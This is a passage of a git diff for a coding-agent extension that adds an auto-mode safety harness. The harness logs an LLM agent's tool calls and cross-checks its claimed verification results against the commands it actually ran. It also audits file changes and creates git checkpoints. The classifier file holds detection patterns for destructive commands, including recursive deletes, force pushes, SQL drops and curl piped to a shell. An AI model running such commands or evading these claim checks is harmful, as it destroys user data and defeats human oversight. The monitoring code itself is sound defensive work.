+      title = title.replace(/^[\u2713\u2705]\s*/, "");
+    }
+
+    if (!done && /[\u2705]\s*$/.test(title)) {
+      done = true;
+      title = title.replace(/\s*[\u2705]\s*$/, "");
     }
 
     if (!done && /\(Complete\)\s*$/i.test(title)) {
@@ -250,7 +273,7 @@ function parseProseSliceHeaders(content: string): RoadmapSliceEntry[] {
 
     // Try to extract depends from prose: "Depends on: S01" or "**Depends on:** S01, S02"
     const afterHeader = content.slice(match.index + match[0].length);
-    const nextHeader = afterHeader.search(/^#{1,4}\s/m);
+    const nextHeader = afterHeader.search(/^\s*#{1,4}\s/m);
     const section = nextHeader !== -1 ? afterHeader.slice(0, nextHeader) : afterHeader.slice(0, 500);
 
     const depsMatch = section.match(/\*{0,2}Depends\s+on:?\*{0,2}\s*(.+)/i);
diff --git a/src/resources/extensions/gsd/rtk-status.ts b/src/resources/extensions/gsd/rtk-status.ts
new file mode 100644
index 000000000..f3f519cdf
--- /dev/null
+++ b/src/resources/extensions/gsd/rtk-status.ts
@@ -0,0 +1,53 @@
+import type { ExtensionContext } from "@gsd/pi-coding-agent";
+import {
+  ensureRtkSessionBaseline,
+  formatRtkSavingsLabel,
+  getRtkSessionSavings,
+} from "../shared/rtk-session-stats.js";
+import { loadEffectiveGSDPreferences } from "./preferences.js";
+
+const STATUS_KEY = "gsd-rtk";
+const REFRESH_INTERVAL_MS = 30_000;
+
+let refreshTimer: ReturnType<typeof setInterval> | null = null;
+
+function clearTimer(): void {
+  if (refreshTimer) {
+    clearInterval(refreshTimer);
+    refreshTimer = null;
+  }
+}
+
+function isRtkEnabledInPrefs(): boolean {
+  return loadEffectiveGSDPreferences()?.preferences.experimental?.rtk === true;
+}
+
+function updateStatus(ctx: ExtensionContext): void {
+  if (!ctx.hasUI) return;
+  if (!isRtkEnabledInPrefs()) return;
+
+  const basePath = ctx.cwd;
+  const sessionId = ctx.sessionManager.getSessionId();
+  ensureRtkSessionBaseline(basePath, sessionId);
+  const savings = getRtkSessionSavings(basePath, sessionId);
+  ctx.ui.setStatus(STATUS_KEY, formatRtkSavingsLabel(savings) ?? undefined);
+}
+
+export function startRtkStatusUpdates(ctx: ExtensionContext): void {
+  clearTimer();
+  if (!isRtkEnabledInPrefs()) {
+    // Ensure any previously set status is cleared (e.g. preference was toggled off)
+    ctx.ui.setStatus(STATUS_KEY, undefined);
+    return;
+  }
+  updateStatus(ctx);
+  if (!ctx.hasUI) return;
+  refreshTimer = setInterval(() => {
+    updateStatus(ctx);
+  }, REFRESH_INTERVAL_MS);
+}
+
+export function stopRtkStatusUpdates(ctx?: ExtensionContext): void {
+  clearTimer();
+  ctx?.ui.setStatus(STATUS_KEY, undefined);
+}
diff --git a/src/resources/extensions/gsd/rule-registry.ts b/src/resources/extensions/gsd/rule-registry.ts
index 6f818080f..7a697257a 100644
--- a/src/resources/extensions/gsd/rule-registry.ts
+++ b/src/resources/extensions/gsd/rule-registry.ts
@@ -6,6 +6,7 @@
 //
 // A module-level singleton accessor allows existing code to migrate incrementally.
 
+import { logWarning } from "./workflow-logger.js";
 import type { UnifiedRule, RulePhase } from "./rule-types.js";
 import type { DispatchAction, DispatchContext, DispatchRule } from "./auto-dispatch.js";
 import type {
@@ -20,20 +21,19 @@ import type {
 import { resolvePostUnitHooks, resolvePreDispatchHooks } from "./preferences.js";
 import { existsSync, readFileSync, writeFileSync, mkdirSync } from "node:fs";
 import { join } from "node:path";
+import { parseUnitId } from "./unit-id.js";
 
 // ─── Artifact Path Resolution ──────────────────────────────────────────────
 
 export function resolveHookArtifactPath(basePath: string, unitId: string, artifactName: string): string {
-  const parts = unitId.split("/");
-  if (parts.length === 3) {
-    const [mid, sid, tid] = parts;
-    return join(basePath, ".gsd", "milestones", mid, "slices", sid, "tasks", `${tid}-${artifactName}`);
+  const { milestone, slice, task } = parseUnitId(unitId);
+  if (task !== undefined && slice !== undefined) {
+    return join(basePath, ".gsd", "milestones", milestone, "slices", slice, "tasks", `${task}-${artifactName}`);
   }
-  if (parts.length === 2) {
-    const [mid, sid] = parts;
-    return join(basePath, ".gsd", "milestones", mid, "slices", sid, artifactName);
+  if (slice !== undefined) {
+    return join(basePath, ".gsd", "milestones", milestone, "slices", slice, artifactName);
   }
-  return join(basePath, ".gsd", "milestones", parts[0], artifactName);
+  return join(basePath, ".gsd", "milestones", milestone, artifactName);
 }
 
 // ─── Dispatch Rule Conversion ──────────────────────────────────────────────
@@ -212,7 +212,7 @@ export class RuleRegistry {
       };
 
       // Build prompt with variable substitution
-      const [mid, sid, tid] = triggerUnitId.split("/");
+      const { milestone: mid, slice: sid, task: tid } = parseUnitId(triggerUnitId);
       let prompt = config.prompt
         .replace(/\{milestoneId\}/g, mid ?? "")
         .replace(/\{sliceId\}/g, sid ?? "")
@@ -291,7 +291,7 @@ export class RuleRegistry {
       return { action: "proceed", prompt, firedHooks: [] };
     }
 
-    const [mid, sid, tid] = unitId.split("/");
+    const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId);
     const substitute = (text: string): string =>
       text
         .replace(/\{milestoneId\}/g, mid ?? "")
@@ -388,8 +388,8 @@ export class RuleRegistry {
       const dir = join(basePath, ".gsd");
       if (!existsSync(dir)) mkdirSync(dir, { recursive: true });
       writeFileSync(this._hookStatePath(basePath), JSON.stringify(state, null, 2), "utf-8");
-    } catch {
-      // Non-fatal — state is recreatable from artifacts
+    } catch (e) {
+      logWarning("registry", `failed to persist hook state: ${(e as Error).message}`);
     }
   }
 
@@ -408,8 +408,8 @@ export class RuleRegistry {
           }
         }
       }
-    } catch {
-      // Non-fatal — fresh state is fine
+    } catch (e) {
+      logWarning("registry", `failed to restore hook state: ${(e as Error).message}`);
     }
   }
 
@@ -424,8 +424,8 @@ export class RuleRegistry {
           "utf-8",
         );
       }
-    } catch {
-      // Non-fatal
+    } catch (e) {
+      logWarning("registry", `failed to clear hook state: ${(e as Error).message}`);
     }
   }
 
@@ -506,7 +506,7 @@ export class RuleRegistry {
     this.cycleCounts.set(cycleKey, currentCycle);
     this.activeHook.cycle = currentCycle;
 
-    const [mid, sid, tid] = unitId.split("/");
+    const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId);
     const prompt = hook.prompt
       .replace(/\{milestoneId\}/g, mid ?? "")
       .replace(/\{sliceId\}/g, sid ?? "")
@@ -525,7 +525,7 @@ export class RuleRegistry {
   formatHookStatus(): string {
     const entries = this.getHookStatus();
     if (entries.length === 0) {
-      return "No hooks configured. Add post_unit_hooks or pre_dispatch_hooks to .gsd/preferences.md";
+      return "No hooks configured. Add post_unit_hooks or pre_dispatch_hooks to .gsd/PREFERENCES.md";
     }
 
     const lines: string[] = ["Configured Hooks:", ""];
diff --git a/src/resources/extensions/gsd/safe-fs.ts b/src/resources/extensions/gsd/safe-fs.ts
index 8872b8b28..3080c00be 100644
--- a/src/resources/extensions/gsd/safe-fs.ts
+++ b/src/resources/extensions/gsd/safe-fs.ts
@@ -1,23 +1,24 @@
 import { existsSync, mkdirSync, cpSync, type CopySyncOptions } from "node:fs"
 import { dirname } from "node:path"
+import { logWarning } from "./workflow-logger.js"
 
 /**
  * Safely creates a directory. Returns true if successful, false on error.
- * Logs to stderr when GSD_DEBUG is set.
+ * Logs warnings via workflow-logger on failure.
  */
 export function safeMkdir(dirPath: string): boolean {
   try {
     mkdirSync(dirPath, { recursive: true })
     return true
   } catch (err) {
-    if (process.env.GSD_DEBUG) console.error(`[gsd] mkdir failed: ${dirPath}`, err)
+    logWarning("fs", `mkdir failed: ${dirPath}: ${(err as Error).message}`)
     return false
   }
 }
 
 /**
  * Safely copies src to dst. Returns true if successful, false if src doesn't exist or copy fails.
- * Logs to stderr when GSD_DEBUG is set.
+ * Logs warnings via workflow-logger on failure.
  */
 export function safeCopy(src: string, dst: string, opts?: CopySyncOptions): boolean {
   if (!existsSync(src)) return false
@@ -25,7 +26,7 @@ export function safeCopy(src: string, dst: string, opts?: CopySyncOptions): bool
     cpSync(src, dst, opts)
     return true
   } catch (err) {
-    if (process.env.GSD_DEBUG) console.error(`[gsd] copy failed: ${src} → ${dst}`, err)
+    logWarning("fs", `copy failed: ${src} → ${dst}: ${(err as Error).message}`)
     return false
   }
 }
@@ -41,7 +42,7 @@ export function safeCopyRecursive(src: string, dst: string, opts?: Omit<CopySync
     cpSync(src, dst, { ...opts, recursive: true })
     return true
   } catch (err) {
-    if (process.env.GSD_DEBUG) console.error(`[gsd] recursive copy failed: ${src} → ${dst}`, err)
+    logWarning("fs", `recursive copy failed: ${src} → ${dst}: ${(err as Error).message}`)
     return false
   }
 }
diff --git a/src/resources/extensions/gsd/safety/content-validator.ts b/src/resources/extensions/gsd/safety/content-validator.ts
new file mode 100644
index 000000000..51d07d6b1
--- /dev/null
+++ b/src/resources/extensions/gsd/safety/content-validator.ts
@@ -0,0 +1,98 @@
+/**
+ * Lightweight content validator for auto-mode safety harness.
+ * Validates that high-value unit outputs contain minimum expected content.
+ *
+ * Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+ */
+
+import { existsSync, readFileSync } from "node:fs";
+import { logWarning } from "../workflow-logger.js";
+
+// ─── Types ──────────────────────────────────────────────────────────────────
+
+export interface ContentViolation {
+  severity: "warning";
+  reason: string;
+}
+
+// ─── Public API ─────────────────────────────────────────────────────────────
+
+/**
+ * Validate content quality for a completed unit.
+ * Returns an array of violations. Empty array = content looks acceptable.
+ *
+ * @param unitType - The type of unit that completed (e.g. "plan-slice")
+ * @param artifactPath - Absolute path to the primary artifact file
+ */
+export function validateContent(
+  unitType: string,
+  artifactPath: string | null,
+): ContentViolation[] {
+  if (!artifactPath || !existsSync(artifactPath)) return [];
+
+  const validator = VALIDATORS[unitType];
+  if (!validator) return [];
+
+  try {
+    const content = readFileSync(artifactPath, "utf-8");
+    return validator(content);
+  } catch (e) {
+    logWarning("safety", `content validation read failed: ${(e as Error).message}`);
+    return [];
+  }
+}
+
+// ─── Validators ─────────────────────────────────────────────────────────────
+
+type ContentValidatorFn = (content: string) => ContentViolation[];
+
+const VALIDATORS: Record<string, ContentValidatorFn> = {
+  "plan-slice": validatePlanSlice,
+  "plan-milestone": validatePlanMilestone,
+};
+
+function validatePlanSlice(content: string): ContentViolation[] {
+  const violations: ContentViolation[] = [];
+
+  // Must have at least 1 task entry — single-task slices are valid (#3649)
+  const taskCount = (content.match(/- \[[ x]\] \*\*T\d+/g) || []).length;
+  if (taskCount < 1) {
+    violations.push({
+      severity: "warning",
+      reason: `Slice plan has ${taskCount} task(s) — expected at least 1`,
+    });
+  }
+
+  // Should have a Files Likely Touched section
+  if (!content.includes("## Files Likely Touched") && !content.includes("## Files")) {
+    violations.push({
+      severity: "warning",
+      reason: "Slice plan missing 'Files Likely Touched' section",
+    });
+  }
+
+  // Should have a verification section
+  if (!content.includes("Verify") && !content.includes("verify")) {
+    violations.push({
+      severity: "warning",
+      reason: "Slice plan has no verification instructions",
+    });
+  }
+
+  return violations;
+}
+
+function validatePlanMilestone(content: string): ContentViolation[] {
+  const violations: ContentViolation[] = [];
+
+  // Must have at least 1 slice entry
+  const sliceCount = (content.match(/##\s+S\d+/g) || []).length;
+  if (sliceCount < 1) {
+    violations.push({
+      severity: "warning",
+      reason: `Milestone roadmap has ${sliceCount} slice(s) — expected at least 1`,
+    });
+  }
+
+  return violations;
+}
diff --git a/src/resources/extensions/gsd/safety/destructive-guard.ts b/src/resources/extensions/gsd/safety/destructive-guard.ts
new file mode 100644
index 000000000..9d8e635bd
--- /dev/null
+++ b/src/resources/extensions/gsd/safety/destructive-guard.ts
@@ -0,0 +1,49 @@
+/**
+ * Destructive command classifier for auto-mode safety harness.
+ * Classifies bash commands and warns on potentially destructive operations.
+ * Does NOT block — only classifies for logging/notification.
+ *
+ * Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+ */
+
+// ─── Pattern Definitions ────────────────────────────────────────────────────
+
+interface DestructivePattern {
+  pattern: RegExp;
+  label: string;
+}
+
+const DESTRUCTIVE_PATTERNS: readonly DestructivePattern[] = [
+  { pattern: /\brm\s+(-[^\s]*[rfRF][^\s]*\s+|.*\s+-[^\s]*[rfRF])/, label: "recursive delete" },
+  { pattern: /\bgit\s+push\s+.*--force/, label: "force push" },
+  { pattern: /\bgit\s+push\s+-f\b/, label: "force push" },
+  { pattern: /\bgit\s+reset\s+--hard/, label: "hard reset" },
+  { pattern: /\bgit\s+clean\s+-[^\s]*[fdxFDX]/, label: "git clean" },
+  { pattern: /\bgit\s+checkout\s+--\s+\./, label: "discard all changes" },
+  { pattern: /\bdrop\s+(database|table|index)\b/i, label: "SQL drop" },
+  { pattern: /\btruncate\s+table\b/i, label: "SQL truncate" },
+  { pattern: /\bchmod\s+777\b/, label: "world-writable permissions" },
+  { pattern: /\bcurl\s.*\|\s*(bash|sh|zsh)\b/, label: "pipe to shell" },
+];
+
+// ─── Public API ─────────────────────────────────────────────────────────────
+
+export interface CommandClassification {
+  destructive: boolean;
+  labels: string[];
+}
+
+/**
+ * Classify a bash command for destructive operations.
+ * Returns the list of matched destructive pattern labels.
+ */
+export function classifyCommand(command: string): CommandClassification {
+  const labels: string[] = [];
+  for (const { pattern, label } of DESTRUCTIVE_PATTERNS) {
+    if (pattern.test(command)) {
+      // Deduplicate labels (e.g., two force-push patterns)
+      if (!labels.includes(label)) labels.push(label);
+    }
+  }
+  return { destructive: labels.length > 0, labels };
+}
diff --git a/src/resources/extensions/gsd/safety/evidence-collector.ts b/src/resources/extensions/gsd/safety/evidence-collector.ts
new file mode 100644
index 000000000..9d57363cf
--- /dev/null
+++ b/src/resources/extensions/gsd/safety/evidence-collector.ts
@@ -0,0 +1,151 @@
+/**
+ * Real-time tool call evidence collector for auto-mode safety harness.
+ * Tracks every bash command, file write, and file edit during a unit execution.
+ * Evidence is compared against LLM completion claims in evidence-cross-ref.ts.
+ *
+ * Follows the same module-level Map pattern as auto-tool-tracking.ts.
+ * Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+ */
+
+// ─── Types ──────────────────────────────────────────────────────────────────
+
+export interface BashEvidence {
+  kind: "bash";
+  toolCallId: string;
+  command: string;
+  exitCode: number;
+  outputSnippet: string;
+  timestamp: number;
+}
+
+export interface FileWriteEvidence {
+  kind: "write";
+  toolCallId: string;
+  path: string;
+  timestamp: number;
+}
+
+export interface FileEditEvidence {
+  kind: "edit";
+  toolCallId: string;
+  path: string;
+  timestamp: number;
+}
+
+export type EvidenceEntry = BashEvidence | FileWriteEvidence | FileEditEvidence;
+
+// ─── Module State ───────────────────────────────────────────────────────────
+
+let unitEvidence: EvidenceEntry[] = [];
+
+// ─── Public API ─────────────────────────────────────────────────────────────
+
+/** Reset all evidence for a new unit. Call at unit start. */
+export function resetEvidence(): void {
+  unitEvidence = [];
+}
+
+/** Get a read-only view of all evidence collected for the current unit. */
+export function getEvidence(): readonly EvidenceEntry[] {
+  return unitEvidence;
+}
+
+/** Get only bash evidence entries. */
+export function getBashEvidence(): readonly BashEvidence[] {
+  return unitEvidence.filter((e): e is BashEvidence => e.kind === "bash");
+}
+
+/** Get all file paths touched (write + edit). */
+export function getFilePaths(): string[] {
+  return unitEvidence
+    .filter((e): e is FileWriteEvidence | FileEditEvidence => e.kind === "write" || e.kind === "edit")
+    .map(e => e.path);
+}
+
+// ─── Recording (called from register-hooks.ts) ─────────────────────────────
+
+/**
+ * Record a tool call at dispatch time (before execution).
+ * Exit codes and output are filled in by recordToolResult after execution.
+ */
+export function recordToolCall(toolName: string, input: Record<string, unknown>): void {
+  if (toolName === "bash" || toolName === "Bash") {
+    unitEvidence.push({
+      kind: "bash",
+      toolCallId: "",
+      command: String(input.command ?? ""),
+      exitCode: -1,
+      outputSnippet: "",
+      timestamp: Date.now(),
+    });
+  } else if (toolName === "write" || toolName === "Write") {
+    unitEvidence.push({
+      kind: "write",
+      toolCallId: "",
+      path: String(input.file_path ?? input.path ?? ""),
+      timestamp: Date.now(),
+    });
+  } else if (toolName === "edit" || toolName === "Edit") {
+    unitEvidence.push({
+      kind: "edit",
+      toolCallId: "",
+      path: String(input.file_path ?? input.path ?? ""),
+      timestamp: Date.now(),
+    });
+  }
+}
+
+/**
+ * Record a tool execution result. Matches the most recent unresolved entry
+ * of the same kind and fills in the toolCallId, exit code, and output.
+ */
+export function recordToolResult(
+  toolCallId: string,
+  toolName: string,
+  result: unknown,
+  isError: boolean,
+): void {
+  const normalizedName = toolName.toLowerCase();
+
+  if (normalizedName === "bash") {
+    const entry = findLastUnresolved("bash") as BashEvidence | undefined;
+    if (entry) {
+      entry.toolCallId = toolCallId;
+      const text = extractResultText(result);
+      entry.outputSnippet = text.slice(0, 500);
+      const exitMatch = text.match(/Command exited with code (\d+)/);
+      entry.exitCode = exitMatch ? Number(exitMatch[1]) : (isError ? 1 : 0);
+    }
+  } else if (normalizedName === "write" || normalizedName === "edit") {
+    const entry = findLastUnresolved(normalizedName as "write" | "edit");
+    if (entry) {
+      entry.toolCallId = toolCallId;
+    }
+  }
+}
+
+// ─── Internals ──────────────────────────────────────────────────────────────
+
+function findLastUnresolved(kind: string): EvidenceEntry | undefined {
+  for (let i = unitEvidence.length - 1; i >= 0; i--) {
+    if (unitEvidence[i].kind === kind && unitEvidence[i].toolCallId === "") {
+      return unitEvidence[i];
+    }
+  }
+  return undefined;
+}
+
+function extractResultText(result: unknown): string {
+  if (typeof result === "string") return result;
+  if (result && typeof result === "object") {
+    const r = result as Record<string, unknown>;
+    if (Array.isArray(r.content)) {
+      const textBlock = r.content.find(
+        (c: unknown) => typeof c === "object" && c !== null && (c as Record<string, unknown>).type === "text",
+      ) as Record<string, unknown> | undefined;
+      if (textBlock && typeof textBlock.text === "string") return textBlock.text;
+    }
+    if (typeof r.text === "string") return r.text;
+  }
+  return String(result ?? "");
+}
diff --git a/src/resources/extensions/gsd/safety/evidence-cross-ref.ts b/src/resources/extensions/gsd/safety/evidence-cross-ref.ts
new file mode 100644
index 000000000..2a57f6962
--- /dev/null
+++ b/src/resources/extensions/gsd/safety/evidence-cross-ref.ts
@@ -0,0 +1,120 @@
+/**
+ * Evidence cross-reference for auto-mode safety harness.
+ * Compares the LLM's claimed verification evidence (command + exitCode)
+ * against actual bash tool calls recorded by the evidence collector.
+ *
+ * Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+ */
+
+import type { BashEvidence, EvidenceEntry } from "./evidence-collector.js";
+
+// ─── Types ──────────────────────────────────────────────────────────────────
+
+export interface ClaimedEvidence {
+  command: string;
+  exitCode: number;
+  verdict: string;
+}
+
+export interface EvidenceMismatch {
+  severity: "warning" | "error";
+  claimed: ClaimedEvidence;
+  actual: BashEvidence | null;
+  reason: string;
+}
+
+// ─── Public API ─────────────────────────────────────────────────────────────
+
+/**
+ * Cross-reference claimed verification evidence against actual bash tool calls.
+ *
+ * Returns an array of mismatches. Empty array = all claims verified.
+ * Skips entries that were coerced from strings (already flagged by db-tools.ts).
+ */
+export function crossReferenceEvidence(
+  claimedEvidence: readonly ClaimedEvidence[],
+  actualEvidence: readonly EvidenceEntry[],
+): EvidenceMismatch[] {
+  const bashCalls = actualEvidence.filter(
+    (e): e is BashEvidence => e.kind === "bash",
+  );
+  const mismatches: EvidenceMismatch[] = [];
+
+  for (const claimed of claimedEvidence) {
+    // Skip coerced entries — they're already flagged with exitCode: -1
+    // and verdict: "unknown (coerced from string)" by db-tools.ts
+    if (claimed.verdict?.includes("coerced from string")) continue;
+    if (claimed.exitCode === -1) continue;
+
+    // Skip entries with empty or generic commands
+    if (!claimed.command || claimed.command.length < 3) continue;
+
+    // Find matching bash call by command substring match
+    const match = findBestMatch(claimed.command, bashCalls);
+
+    if (!match) {
+      mismatches.push({
+        severity: "warning",
+        claimed,
+        actual: null,
+        reason: `No bash tool call found matching "${claimed.command.slice(0, 80)}"`,
+      });
+      continue;
+    }
+
+    // Exit code mismatch: LLM claims success but actual command failed
+    if (claimed.exitCode === 0 && match.exitCode !== 0) {
+      mismatches.push({
+        severity: "error",
+        claimed,
+        actual: match,
+        reason: `Claimed exitCode=0 but actual exitCode=${match.exitCode}`,
+      });
+    }
+  }
+
+  return mismatches;
+}
+
+// ─── Internals ──────────────────────────────────────────────────────────────
+
+/**
+ * Find the best matching bash evidence entry for a claimed command.
+ * Uses substring matching — the claimed command may be a shortened version
+ * of the actual command, or vice versa.
+ */
+function findBestMatch(
+  claimedCommand: string,
+  bashCalls: readonly BashEvidence[],
+): BashEvidence | null {
+  const normalized = claimedCommand.trim();
+
+  // Exact match first
+  const exact = bashCalls.find(b => b.command.trim() === normalized);
+  if (exact) return exact;
+
+  // Substring match: claimed is contained in actual or actual in claimed
+  const substring = bashCalls.find(
+    b => b.command.includes(normalized) || normalized.includes(b.command),
+  );
+  if (substring) return substring;
+
+  // Token match: split on whitespace and check significant overlap
+  const claimedTokens = normalized.split(/\s+/).filter(t => t.length > 2);
+  if (claimedTokens.length === 0) return null;
+
+  let bestMatch: BashEvidence | null = null;
+  let bestScore = 0;
+
+  for (const call of bashCalls) {
+    const callTokens = new Set(call.command.split(/\s+/));
+    const matchCount = claimedTokens.filter(t => callTokens.has(t)).length;
+    const score = matchCount / claimedTokens.length;
+    if (score > bestScore && score >= 0.5) {
+      bestScore = score;
+      bestMatch = call;
+    }
+  }
+
+  return bestMatch;
+}
diff --git a/src/resources/extensions/gsd/safety/file-change-validator.ts b/src/resources/extensions/gsd/safety/file-change-validator.ts
new file mode 100644
index 000000000..acc0dc927
--- /dev/null
+++ b/src/resources/extensions/gsd/safety/file-change-validator.ts
@@ -0,0 +1,111 @@
+/**
+ * Post-unit file change validator for auto-mode safety harness.
+ * Compares actual git diff against the task plan's expected output files.
+ *
+ * Uses tasks.expected_output (DB column, populated from per-task ## Expected Output)
+ * and tasks.files (from slice PLAN.md - Files: subline) as the expected set.
+ * Compares against git diff HEAD~1 --name-only after auto-commit.
+ *
+ * Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+ */
+
+import { execFileSync } from "node:child_process";
+import { normalizePlannedFileReference } from "../files.js";
+import { logWarning } from "../workflow-logger.js";
+
+// ─── Types ──────────────────────────────────────────────────────────────────
+
+export interface FileViolation {
+  severity: "info" | "warning";
+  file: string;
+  reason: string;
+}
+
+export interface FileChangeAudit {
+  expectedFiles: string[];
+  actualFiles: string[];
+  unexpectedFiles: string[];
+  missingFiles: string[];
+  violations: FileViolation[];
+}
+
+// ─── Public API ─────────────────────────────────────────────────────────────
+
+/**
+ * Validate file changes after auto-commit for an execute-task unit.
+ * Returns null if task data is unavailable or DB is not loaded.
+ *
+ * @param basePath - Working directory (worktree or project root)
+ * @param expectedOutput - JSON array from tasks.expected_output DB column
+ * @param plannedFiles - JSON array from tasks.files DB column
+ */
+export function validateFileChanges(
+  basePath: string,
+  expectedOutput: string[],
+  plannedFiles: string[],
+): FileChangeAudit | null {
+  const allExpected = new Set([...expectedOutput, ...plannedFiles]);
+
+  // If no expected files were planned, skip validation
+  if (allExpected.size === 0) return null;
+
+  // Get actual changed files from last commit
+  const actualFiles = getChangedFilesFromLastCommit(basePath);
+  if (!actualFiles) return null;
+
+  // Filter out .gsd/ internal files — only validate project source files
+  const projectFiles = actualFiles.filter(f => !f.startsWith(".gsd/") && !f.startsWith(".gsd\\"));
+
+  // Normalize expected paths (strip leading ./ or /)
+  const normalizedExpected = new Set(
+    [...allExpected].map((f) =>
+      normalizePlannedFileReference(f).replace(/^\.\//, "").replace(/^\//, ""),
+    ),
+  );
+
+  // Compute symmetric difference
+  const unexpectedFiles = projectFiles.filter(f => !normalizedExpected.has(f));
+  const missingFiles = [...normalizedExpected].filter(f => !projectFiles.includes(f));
+
+  const violations: FileViolation[] = [];
+
+  for (const f of unexpectedFiles) {
+    violations.push({
+      severity: "warning",
+      file: f,
+      reason: "Modified but not in task plan's expected output",
+    });
+  }
+
+  for (const f of missingFiles) {
+    violations.push({
+      severity: "info",
+      file: f,
+      reason: "Listed in task plan but not modified",
+    });
+  }
+
+  return {
+    expectedFiles: [...normalizedExpected],
+    actualFiles: projectFiles,
+    unexpectedFiles,
+    missingFiles,
+    violations,
+  };
+}
+
+// ─── Internals ──────────────────────────────────────────────────────────────
+
+function getChangedFilesFromLastCommit(basePath: string): string[] | null {
+  try {
+    const result = execFileSync(
+      "git",
+      ["diff", "--name-only", "HEAD~1", "HEAD"],
+      { cwd: basePath, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" },
+    ).trim();
+    return result ? result.split("\n").filter(Boolean) : [];
+  } catch (e) {
+    logWarning("safety", `git diff failed in file-change-validator: ${(e as Error).message}`);
+    return null;
+  }
+}
diff --git a/src/resources/extensions/gsd/safety/git-checkpoint.ts b/src/resources/extensions/gsd/safety/git-checkpoint.ts
new file mode 100644
index 000000000..4f66b6dbb
--- /dev/null
+++ b/src/resources/extensions/gsd/safety/git-checkpoint.ts
@@ -0,0 +1,106 @@
+/**
+ * Pre-unit git checkpoint and rollback for auto-mode safety harness.
+ * Uses the existing refs/gsd/ namespace (already pruned by doctor).
+ *
+ * Creates a lightweight ref at HEAD before unit execution. On failure,
+ * the ref can be used to rollback the branch to the pre-unit state.
+ *
+ * Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+ */
+
+import { execFileSync } from "node:child_process";
+import { logWarning } from "../workflow-logger.js";
+
+// ─── Constants ──────────────────────────────────────────────────────────────
+
+const CHECKPOINT_PREFIX = "refs/gsd/checkpoints/";
+
+// ─── Public API ─────────────────────────────────────────────────────────────
+
+/**
+ * Create a checkpoint ref at the current HEAD for the given unit.
+ * Returns the SHA of HEAD, or null if the operation fails.
+ */
+export function createCheckpoint(basePath: string, unitId: string): string | null {
+  try {
+    const sha = execFileSync("git", ["rev-parse", "HEAD"], {
+      cwd: basePath,
+      stdio: ["ignore", "pipe", "pipe"],
+      encoding: "utf-8",
+    }).trim();
+
+    if (!sha || sha.length < 7) return null;
+
+    // Sanitize unitId for use in ref path (replace / with -)
+    const safeUnitId = unitId.replace(/\//g, "-");
+
+    execFileSync("git", ["update-ref", `${CHECKPOINT_PREFIX}${safeUnitId}`, sha], {
+      cwd: basePath,
+      stdio: ["ignore", "pipe", "pipe"],
+    });
+
+    return sha;
+  } catch (e) {
+    logWarning("safety", `checkpoint creation failed: ${(e as Error).message}`);
+    return null;
+  }
+}
+
+/**
+ * Rollback the current branch to a checkpoint SHA.
+ * Returns true on success, false on failure.
+ *
+ * WARNING: This is a destructive operation — it discards all changes
+ * since the checkpoint. Only call when the user has opted in via
+ * safety_harness.auto_rollback or an explicit manual trigger.
+ */
+export function rollbackToCheckpoint(
+  basePath: string,
+  unitId: string,
+  sha: string,
+): boolean {
+  try {
+    // Get current branch name
+    const branch = execFileSync("git", ["rev-parse", "--abbrev-ref", "HEAD"], {
+      cwd: basePath,
+      stdio: ["ignore", "pipe", "pipe"],
+      encoding: "utf-8",
+    }).trim();
+
+    if (!branch || branch === "HEAD") {
+      logWarning("safety", "rollback: detached HEAD state, cannot rollback");
+      return false;
+    }
+
+    // Reset branch pointer and working tree to checkpoint SHA in one step.
+    // Using `git reset --hard <sha>` works on the currently checked-out branch
+    // (unlike `git branch -f` which is rejected for checked-out branches).
+    execFileSync("git", ["reset", "--hard", sha], {
+      cwd: basePath,
+      stdio: ["ignore", "pipe", "pipe"],
+    });
+
+    // Cleanup checkpoint ref
+    cleanupCheckpoint(basePath, unitId);
+
+    return true;
+  } catch (e) {
+    logWarning("safety", `rollback failed: ${(e as Error).message}`);
+    return false;
+  }
+}
+
+/**
+ * Remove a checkpoint ref after successful unit completion.
+ */
+export function cleanupCheckpoint(basePath: string, unitId: string): void {
+  try {
+    const safeUnitId = unitId.replace(/\//g, "-");
+    execFileSync("git", ["update-ref", "-d", `${CHECKPOINT_PREFIX}${safeUnitId}`], {
+      cwd: basePath,
+      stdio: ["ignore", "pipe", "pipe"],
+    });
+  } catch {
+    // Non-fatal — ref may already have been cleaned up
+  }
+}
diff --git a/src/resources/extensions/gsd/safety/safety-harness.ts b/src/resources/extensions/gsd/safety/safety-harness.ts
new file mode 100644
index 000000000..f4e9e83d1
--- /dev/null
+++ b/src/resources/extensions/gsd/safety/safety-harness.ts
@@ -0,0 +1,105 @@
+/**
+ * Safety Harness — central module for LLM damage control during auto-mode.
+ * Provides types, preference resolution, and orchestration for all safety components.
+ *
+ * Components:
+ * - evidence-collector.ts: Real-time tool call tracking
+ * - destructive-guard.ts: Bash command classification
+ * - file-change-validator.ts: Post-unit git diff vs plan
+ * - evidence-cross-ref.ts: Claimed vs actual verification evidence
+ * - git-checkpoint.ts: Pre-unit checkpoints + rollback
+ * - content-validator.ts: Output quality validation
+ *
+ * Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+ */
+
+// ─── Types ──────────────────────────────────────────────────────────────────
+
+export interface SafetyHarnessConfig {
+  enabled: boolean;
+  evidence_collection: boolean;
+  file_change_validation: boolean;
+  evidence_cross_reference: boolean;
+  destructive_command_warnings: boolean;
+  content_validation: boolean;
+  checkpoints: boolean;
+  auto_rollback: boolean;
+  timeout_scale_cap: number;
+}
+
+// ─── Defaults ───────────────────────────────────────────────────────────────
+
+const DEFAULTS: SafetyHarnessConfig = {
+  enabled: true,
+  evidence_collection: true,
+  file_change_validation: true,
+  evidence_cross_reference: true,
+  destructive_command_warnings: true,
+  content_validation: true,
+  checkpoints: true,
+  auto_rollback: false,
+  timeout_scale_cap: 6,
+};
+
+// ─── Public API ─────────────────────────────────────────────────────────────
+
+/**
+ * Resolve safety harness configuration from raw preferences.
+ * Missing fields fall back to defaults.
+ */
+export function resolveSafetyHarnessConfig(
+  raw: Record<string, unknown> | undefined,
+): SafetyHarnessConfig {
